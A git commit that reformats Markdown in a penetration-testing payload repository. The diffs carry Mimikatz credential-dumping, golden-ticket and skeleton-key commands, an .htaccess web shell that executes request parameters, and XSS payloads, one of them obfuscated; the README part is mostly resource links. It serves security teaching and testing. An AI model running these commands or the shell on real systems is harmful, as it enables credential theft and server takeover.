Markdown formatting - Part 2

This commit is contained in:
Swissky 2018-08-13 12:01:13 +02:00
parent 65654f81a4
commit b87e14a0ed
5 changed files with 126 additions and 107 deletions

View File

@ -2,40 +2,45 @@
![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png) ![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
## Mimikatz basic ## Mimikatz - Execute commands
Only one command Only one command
```bash ```powershell
PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
``` ```
Mimikatz console (multiple commands) Mimikatz console (multiple commands)
```bash ```powershell
PS C:\temp\mimikatz> .\mimikatz PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest mimikatz # sekurlsa::wdigest
```
## Mimikatz - Extract passwords
```powershell
mimikatz_command -f sekurlsa::logonPasswords full mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest mimikatz_command -f sekurlsa::wdigest
``` ```
Mimikatz Golden ticket ## Mimikatz Golden ticket
```powershell ```powershell
.\mimikatz kerberos::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt .\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
```
```powershell
.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit .\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
``` ```
Mimikatz Skeleton key ## Mimikatz Skeleton key
```powershell ```powershell
privilege::debug privilege::debug
misc::skeleton misc::skeleton
# map the share # map the share
net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
# login as someone # login as someone

154
README.md
View File

@ -1,100 +1,110 @@
# Payloads All The Things # Payloads All The Things
A list of useful payloads and bypasses for Web Application Security. A list of useful payloads and bypasses for Web Application Security.
Feel free to improve with your payloads and techniques ! Feel free to improve with your payloads and techniques !
I <3 pull requests :) I <3 pull requests :)
You can also contribute with a beer IRL or [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
You can also contribute with a beer IRL or with `buymeacoffee.com`
[![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
Every section contains: Every section contains:
- README.md - vulnerability description and how to exploit it
- Intruders - a set of files to give to Burp Intruder - README.md - vulnerability description and how to exploit it
- Some exploits - Intruders - a set of files to give to Burp Intruder
- Some exploits
You might also like : You might also like :
* [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/)
* [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)
* [Methodology_and_enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology_and_enumeration.md)
* [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md)
* [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
* [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md)
* [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)
* [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md)
* [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
* [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)
* [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
* Apache Struts 2 CVE-2017-5638.py
* Apache Struts 2 CVE-2017-9805.py
* Drupalgeddon2 CVE-2018-7600.rb
* Heartbleed CVE-2014-0160.py
* Shellshock CVE-2014-6271.py
* Tomcat CVE-2017-12617.py
- [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/)
- [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)
- [Methodology_and_enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology_and_enumeration.md)
- [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md)
- [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
- [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md)
- [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)
- [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md)
- [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
- [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)
- [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
- Apache Struts 2 CVE-2017-5638.py
- Apache Struts 2 CVE-2017-9805.py
- Drupalgeddon2 CVE-2018-7600.rb
- Heartbleed CVE-2014-0160.py
- Shellshock CVE-2014-6271.py
- Tomcat CVE-2017-12617.py
## Try Harder ## Try Harder
Ever wonder where you can use your knowledge ? The following list will help you find "targets" to improve your skills. Ever wonder where you can use your knowledge ? The following list will help you find "targets" to improve your skills.
* __Bug Bounty Platforms__ - __Bug Bounty Platforms__
* [HackerOne](https://hackerone.com) - [HackerOne](https://hackerone.com)
* [BugCrowd](https://bugcrowd.com) - [BugCrowd](https://bugcrowd.com)
* [Bounty Factory](https://bountyfactory.io) - [Bounty Factory](https://bountyfactory.io)
* [Synack](https://www.synack.com/) - [Synack](https://www.synack.com/)
* [Intigriti](https://www.intigriti.com) - [Intigriti](https://www.intigriti.com)
* [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/) - [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
* __Online Platforms__ - __Online Platforms__
* [Hack The Box](hackthebox.eu/) - [Hack The Box](hackthebox.eu/)
* [Penetration test lab "Test lab" | Pentestit](https://lab.pentestit.ru) - [Penetration test lab "Test lab" | Pentestit](https://lab.pentestit.ru)
* [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/) - [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
* [Zenk-Security](https://www.zenk-security.com/epreuves.php) - [Zenk-Security](https://www.zenk-security.com/epreuves.php)
* [Root-Me](https://www.root-me.org) - [Root-Me](https://www.root-me.org)
* [W3Challs](https://w3challs.com/) - [W3Challs](https://w3challs.com/)
* [NewbieContest](https://www.newbiecontest.org/) - [NewbieContest](https://www.newbiecontest.org/)
* [Vulnhub](https://www.vulnhub.com/) - [Vulnhub](https://www.vulnhub.com/)
* [The Cryptopals Crypto Challenges](https://cryptopals.com/) - [The Cryptopals Crypto Challenges](https://cryptopals.com/)
* [alert(1) to win](https://alf.nu/alert1) - [alert(1) to win](https://alf.nu/alert1)
* [Hacksplaining](https://www.hacksplaining.com/exercises) - [Hacksplaining](https://www.hacksplaining.com/exercises)
* [HackThisSite](https://hackthissite.org) - [HackThisSite](https://hackthissite.org)
* [Hackers.gg](hackers.gg) - [Hackers.gg](hackers.gg)
* [Mind Map - Penetration Testing Practice Labs - Aman Hardikar](http://www.amanhardikar.com/mindmaps/Practice.html) - [Mind Map - Penetration Testing Practice Labs - Aman Hardikar](http://www.amanhardikar.com/mindmaps/Practice.html)
## Book's list ## Book's list
Grab a book and relax, these ones are the best security books (in my opinion).
* [Web Hacking 101](https://leanpub.com/web-hacking-101)
* [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
* [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
* [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
* [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
* [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
* [The Mobile Application Hackers Handbook](http://amzn.to/2cVOIrE)
* [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
* [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
* [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
* [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
* [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
* [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
* [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
* [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
* [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
* [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
* [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
Grab a book and relax, these ones are the best security books (in my opinion).
- [Web Hacking 101](https://leanpub.com/web-hacking-101)
- [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
- [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
- [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
- [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
- [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
- [The Mobile Application Hackers Handbook](http://amzn.to/2cVOIrE)
- [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
- [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
- [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
- [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
- [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
- [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
- [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
- [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
- [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
- [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
- [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
## More resources ## More resources
### Blogs/Websites ### Blogs/Websites
* [BUG BOUNTY FIELD MANUAL: THE DEFINITIVE GUIDE FOR PLANNING, LAUNCHING, AND OPERATING A SUCCESSFUL BUG BOUNTY PROGRAM](https://www.hackerone.com/blog/the-bug-bounty-field-manual)
* [How to become a Bug Bounty Hunter - Sam Houston](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102) - [BUG BOUNTY FIELD MANUAL: THE DEFINITIVE GUIDE FOR PLANNING, LAUNCHING, AND OPERATING A SUCCESSFUL BUG BOUNTY PROGRAM](https://www.hackerone.com/blog/the-bug-bounty-field-manual)
* [Tips from Top Hackers Bug Hunting methodology and the importance of writing quality submissions - Sam Houston](https://www.bugcrowd.com/tips-from-top-hackers-bug-hunting-methodology-and-the-importance-of-writing-quality-submissions/) - [How to become a Bug Bounty Hunter - Sam Houston](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102)
* [ARNE SWINNEN'S SECURITY BLOG JUST ANOTHER INFOSEC BLOG](https://www.arneswinnen.net) - [Tips from Top Hackers Bug Hunting methodology and the importance of writing quality submissions - Sam Houston](https://www.bugcrowd.com/tips-from-top-hackers-bug-hunting-methodology-and-the-importance-of-writing-quality-submissions/)
* [XSS Jigsaw - innerht.ml](https://blog.innerht.ml) - [ARNE SWINNEN'S SECURITY BLOG JUST ANOTHER INFOSEC BLOG](https://www.arneswinnen.net)
* [ZeroSec Blog: Featuring Write-Ups, Projects & Adventures](https://blog.zsec.uk/tag/ltr101/) - [XSS Jigsaw - innerht.ml](https://blog.innerht.ml)
- [ZeroSec Blog: Featuring Write-Ups, Projects & Adventures](https://blog.zsec.uk/tag/ltr101/)
### Youtube ### Youtube
* [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
* [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
* [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
* [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
- [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
- [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
- [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
- [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
### Docker ### Docker
| Command | Link | | Command | Link |
| :------------- | :------------- | | :------------- | :------------- |
| `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) | | `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) |

View File

@ -1,10 +1,11 @@
# .htaccess upload # .htaccess upload
Uploading an .htaccess file to override Apache rule and execute PHP. Uploading an .htaccess file to override Apache rule and execute PHP.
"Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerabler server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded." "Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerabler server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded."
Self contained .htaccess web shell Self contained .htaccess web shell
```
```python
# Self contained .htaccess web shell - Part of the htshell project # Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com # Written by Wireghoul - http://www.justanotherhacker.com
@ -17,11 +18,14 @@ Allow from all
# Make .htaccess file be interpreted as php file. This occur after apache has interpreted # Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file # the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess AddType application/x-httpd-php .htaccess
###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######
``` ```
```php
###### SHELL ######
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
```
## Thanks to ## Thanks to
* [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen ](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
* [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
* [](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability) * [](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)

View File

@ -215,10 +215,10 @@ XSS in SVG
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript"> <script type="text/javascript">
alert(document.domain); alert(document.domain);
</script> </script>
</svg> </svg>
``` ```
@ -530,12 +530,12 @@ document.appendChild(i);
XSSObject.proxy = function (obj, name, report_function_name, exec_original) { XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
var proxy = obj[name]; var proxy = obj[name];
obj[name] = function () { obj[name] = function () {
if (exec_original) { if (exec_original) {
return proxy.apply(this, arguments); return proxy.apply(this, arguments);
} }
}; };
XSSObject.lockdown(obj, name); XSSObject.lockdown(obj, name);
}; };
XSSObject.proxy(window, 'alert', 'window.alert', false); XSSObject.proxy(window, 'alert', 'window.alert', false);
``` ```
@ -571,7 +571,7 @@ Bypass using HTML encoding
%26%2397;lert(1) %26%2397;lert(1)
``` ```
Bypass using Katakana (https://github.com/aemkei/katakana.js) Bypass using [Katakana](https://github.com/aemkei/katakana.js)
```javascript ```javascript
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
@ -723,7 +723,7 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
?"></script><base%20c%3D=href%3Dhttps:\mysite> ?"></script><base%20c%3D=href%3Dhttps:\mysite>
``` ```
## More fun ? ## More fun
This section will be used for the "fun/interesting/useless" stuff. This section will be used for the "fun/interesting/useless" stuff.
@ -743,9 +743,9 @@ Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php
- [(Relative Path Overwrite) RPO XSS - Infinite Security](http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html) - [(Relative Path Overwrite) RPO XSS - Infinite Security](http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html)
- [RPO TheSpanner](http://www.thespanner.co.uk/2014/03/21/rpo/) - [RPO TheSpanner](http://www.thespanner.co.uk/2014/03/21/rpo/)
- [RPO Gadget - innerthmtl](http://blog.innerht.ml/rpo-gadgets/) - [RPO Gadget - innerthmtl](http://blog.innerht.ml/rpo-gadgets/)
- http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite - [Relative Path Overwrite - Detectify](http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite)
- http://d3adend.org/xss/ghettoBypass - [XSS ghettoBypass - d3adend](http://d3adend.org/xss/ghettoBypass)
- http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html - [XSS without HTML: Client-Side Template Injection with AngularJS](http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html)
- http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html - [XSSING WEB PART - 2 - Rakesh Mane](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)
- https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5 - [Making an XSS triggered by CSP bypass on Twitter. @tbmnull](https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5)
- https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309 - [Ways to alert(document.domain) - @tomnomnom](https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309)